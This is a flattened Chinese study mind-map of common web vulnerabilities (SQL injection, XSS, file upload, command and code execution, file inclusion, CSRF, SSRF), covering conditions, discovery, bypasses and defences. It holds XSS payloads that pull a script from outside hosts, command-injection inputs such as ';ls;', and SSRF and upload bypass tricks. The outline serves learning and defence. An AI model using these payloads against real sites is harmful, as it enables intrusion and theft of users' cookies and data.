Web常见漏洞
2022-10-09 19:46:38 0 举报AI智能生成
登录查看完整内容
根据web漏洞常见类型,整理了漏洞的利用条件、挖掘方法、常用代码等
作者其他创作
大纲/内容
and1=1/and1=2(整型)
随机输入(整型)
-1/+1回显上下页(整型)
单引号(字符型整型)
and sleep(5)(判断页面返回时间)
注入点查找
能使用union
页面必须有显示位
前提
找到注入点并判断闭合字符
判断数据库类型
猜解列数,爆显示位
得到基本信息(如数据库名、数据库版本等)
清解表名
得到列名
得到列值
注入步骤
可联合查询注入
页面没有显示位
源码使用了echo mysqlerror(输出了错误信息
information_schema.tables group by )a )-
使用公式依次替换语句即可,后续步骤和union注入一样
注入手法
报错型注入
页面存在注入但是没有显示位且源码没有使用echo mysql_error(输出错误信息
?id=1and注入语句)-+根据返回结果是否相同来得到数据
主要利用了length0、asci0、substr0得到结果
布尔型注入
根据页面返回时间的不同来得到数据
基于时间延迟注入
只在MSSQL数据库存在
一个SQL语句后跟分号后再跟一个语句即可执行两个语句
多语句查询
根据语法
整型
字符串型
搜索型
根据类型
注入分类
GET
POST
X-Forwarded-For
Cookie
User-Agent
注入位置
SQL注入
盗取管理员cookie
Xss蠕虫
挂马
网站重定向
修改网顶内容
危害
各类SNS
邮件系统
BBS
微博
主要是一些大型社交网站
攻击场景
一般是url参数中的值能回显到页面且url参数过滤不严
反射型xss
可以提交内容
提交的内容可被管理员或其他用户看到
提交的内容未被过滤或过滤不严
存储型xss
前提条件
在标签中<div>xss test</div>
在属性内<input type=\"text\"name=\"content'\"value=\"xss test'\">
可以使用\">xss test来测试
漏洞位置
<script src='http://b.ioio.pub/xss/probe.js'></script>
<img src=\"http://a.com/xss/1.js\"/>
<img src=x onerror=\"s=createElement('script');body.appendChild(s);s.src='http://a.com/xss/probe.js'\";>
常见Payload
般先输入AAAA<>\"&'()查看过滤了哪些字符
手工检测
APPSCAN、AWVS、Burp Suite、XSSER、XSSF
全自动XSS检测
XSS挖掘
过滤输入与输出
httponly
防御
XSS
常见可执行文件后缀:php php2 php3 php5 phtmlasp aspx ascx ashx cer asajsp jspx
找上传点,如头像、附件等的上传
找类似upload的脚本文件或目录
找编辑器目录
漏洞挖掘
首先,上传的文件可被执行
其次,用户在web可以访问到这个文件
最后,用户上传的文件未被压宿、格式化等改变内容
利用条件
配置不当直接getshell
burp suite
本地上传被绕过
黑名单绕过
MIME绕过
截断上传
.htaccess
.user.ini
文件攻击
文件幻数
检测文件内容
服务端过滤被绕过
00截断上传
建立*.asp、*.asa格式的文件夹下的文件会以asp解析
*.asp;1jpg会以asp解析
IIS解析漏洞
当Apache遇到不认识的扩展名时会依次向前解析,若都不认识测暴漏源码
Apache2.0.59|2.2.62.2.82.2.112.2.171有解析漏洞
Apache解析漏洞
低版本的可在任意文件名后添加600.php进行解析
Nginx解析漏洞
IIS7/7.5中,a.com/x.txt/x.php的x.txt会被解析为php(在a.com/x.txt后添加x.php)
Nginxt也和IIS7一样,任意文件名任意文件名.php会被解析为php
PHP CGI解析漏洞
文件解析漏洞
开源编辑器上传漏洞
漏洞分类
文件上传
php中使用了ysytem、exec、shel_exec、passthru、popen、proc_popens等函数
用户可以控制函数中的参数
对用户参数未过滤或过滤不严
system(\"$arg\":/直接输入即可
system(\"bin/prog $arg\"); //直接输入;ls
ystem(\"bin/prog -p $arg\");//和上面一样
system(\"bin/prog -p=\\\"$arg\\\"\"); //可以输入\";ls;\"
system(\"bin/prog -p='$arg\");/可以输入';ls;'
示例
少用执行命令的函数
参数值尽量用引号包括
对爹数过滤,对敏感字符进行过滤
漏洞修复
命令执行
不使用eval
对字符串进行转义
不使用preg_replacef的e修饰符,使用preg_replace_.callback替换
www.xx.com/new/detail/id/{$_POST[xx]}}
框架找漏洞
www.xx.com/news/show/id/124
执行代码的函数:eval、assert
callbackl函数:preg_replace + /e模式
反序列化(unserialize)
漏洞利用点
php:eval、asert
python:exec
相关函数
代码执行
include
include once
require
require_once
函数
包含的文件中只要内容符合php规范,不管扩展名是什么都会被php解析,不符合php规范测暴漏源码
上传图片马然后包含
读敏感文件
包含日志getshell
包含伪协议
本地包含
要保证allow_url_fopen和allow_url_includej为On
远程包含
php中配置open_basedir
过滤./\\
禁止服务器远程文件包含
文件包含
二次确认
Tokeni认证
Referer
漏洞类型
有意义的操作(如修改密码)
验证过于简单(参数固定、我们可以设置参数)
利用场景
知道u所有参数项并了解其含义
诱导用户访问构造好的POC
CSRF
服务端提供了从其他服务器获取资源的功能
服务端为对目标地址做严格过滤
条件
通过ur分享内容
文件处理、编码处理、转码
在线番翻译
通过u地址加载与下载图片
阁片、文章的收藏
设置邮件接收服务器
从web功能上
share、wap、url、link、src、source、target、u、3g、display、sourceurl、.imageurl、.domain等
从url关键字寻找
请求一张图片,看发起请求的是谁
漏洞验证
http://A.com@10.10.10.10=10.10.10.10
IP使用其他进制:127.0.0.1=2130706433
使用短地址:http://10.10.116.11=http://t.cn/RwbLKDx
端口绕过:ip后面加个端口
10.0.0.1.xip.i0=10.0.0.1
www.10.0.0.1.xip.io=10.0.0.1
mysite.10.0.0.1.xip.io=10.0.0.1
foo.bar.10.0.0.1.xip.io=10.0.0.1
xip.io
js跳转
绕过
SSRF
Web常见漏洞
0 条评论
回复 删除
下一页
